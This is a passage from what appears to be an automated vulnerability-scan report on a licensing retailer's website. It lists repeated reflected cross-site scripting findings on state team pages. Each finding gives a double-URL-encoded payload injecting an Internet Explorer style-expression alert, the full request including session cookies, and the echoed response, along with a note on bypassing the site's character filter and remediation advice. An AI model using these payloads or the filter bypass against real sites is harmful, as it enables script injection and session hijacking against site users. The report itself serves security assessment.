<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175369&b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1&b1e4f'style='x:expression(alert(1))'77e22b95d60=1&fromsla=T&b1e4f%27style%3d%27x%3aexpression%28alert%281%29%29%2777e22b95d60=1'>
...[SNIP]...

1.96. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Kentucky

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7860b'style='x:expression(alert(1))'bb84182b6d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Kentucky?7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:18 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:18 GMT
NS_RTIMER_COMPOSITE: 1558098663:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=989
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110267


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kentucky</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175370&7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1&7860b'style='x:expression(alert(1))'bb84182b6d5=1&7860b%27style%3d%27x%3aexpression%28alert%281%29%29%27bb84182b6d5=1&fromsla=T'>
...[SNIP]...

1.97. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Louisiana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e214f'style='x:expression(alert(1))'8a4ef989e82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Louisiana?e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:22 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:20 GMT
NS_RTIMER_COMPOSITE: 1558099633:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=448
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110610


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Louisiana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175371&e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1&e214f'style='x:expression(alert(1))'8a4ef989e82=1&fromsla=T&e214f%27style%3d%27x%3aexpression%28alert%281%29%29%278a4ef989e82=1'>
...[SNIP]...

1.98. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Maryland

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as baba6'style='x:expression(alert(1))'86c1a467bc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Maryland?baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:22 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 334652572:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 107493


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Maryland</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175374&baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1&baba6'style='x:expression(alert(1))'86c1a467bc1=1&fromsla=T&baba6%27style%3d%27x%3aexpression%28alert%281%29%29%2786c1a467bc1=1'>
...[SNIP]...

1.99. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Massachusetts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24d7e'style='x:expression(alert(1))'473118b635c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Massachusetts?24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:26 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -811333024:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=952
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110989


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Massachusetts</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175375&24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1&24d7e'style='x:expression(alert(1))'473118b635c=1&fromsla=T&24d7e%27style%3d%27x%3aexpression%28alert%281%29%29%27473118b635c=1'>
...[SNIP]...

1.100. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Michigan

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4c53'style='x:expression(alert(1))'cbce184105d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Michigan?c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 328763124:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111075


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Michigan</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175376&c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1&c4c53%27style%3d%27x%3aexpression%28alert%281%29%29%27cbce184105d=1&c4c53'style='x:expression(alert(1))'cbce184105d=1&fromsla=T'>
...[SNIP]...

1.101. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Minnesota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84920'style='x:expression(alert(1))'64dd360bb51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Minnesota?84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 226398478:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=867
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110670


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Minnesota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175378&84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1&84920'style='x:expression(alert(1))'64dd360bb51=1&fromsla=T&84920%27style%3d%27x%3aexpression%28alert%281%29%29%2764dd360bb51=1'>
...[SNIP]...

1.102. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Mississippi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fff1'style='x:expression(alert(1))'459cb5a215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Mississippi?2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:23 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -259178534:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=974
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110299


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Mississippi</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175380&2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1&2fff1'style='x:expression(alert(1))'459cb5a215=1&2fff1%27style%3d%27x%3aexpression%28alert%281%29%29%27459cb5a215=1&fromsla=T'>
...[SNIP]...

1.103. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Missouri

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7754c'style='x:expression(alert(1))'27eccdc1792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Missouri?7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:26 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -1255233885:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=970
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111500


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Missouri</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175381&7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1&7754c'style='x:expression(alert(1))'27eccdc1792=1&7754c%27style%3d%27x%3aexpression%28alert%281%29%29%2727eccdc1792=1&fromsla=T'>
...[SNIP]...

1.104. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Montana

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bcaf'style='x:expression(alert(1))'1afca94aa79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Montana?5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:31 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1666357285:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=995
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110208


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Montana</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
nsing.com/s.nl?sc=77&category=175383&5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1&5bcaf%27style%3d%27x%3aexpression%28alert%281%29%29%271afca94aa79=1&fromsla=T&5bcaf'style='x:expression(alert(1))'1afca94aa79=1'>
...[SNIP]...

1.105. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Montreal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c04c'style='x:expression(alert(1))'d59743044a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Montreal?7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:19 GMT
Server: Apache
Expires: 0
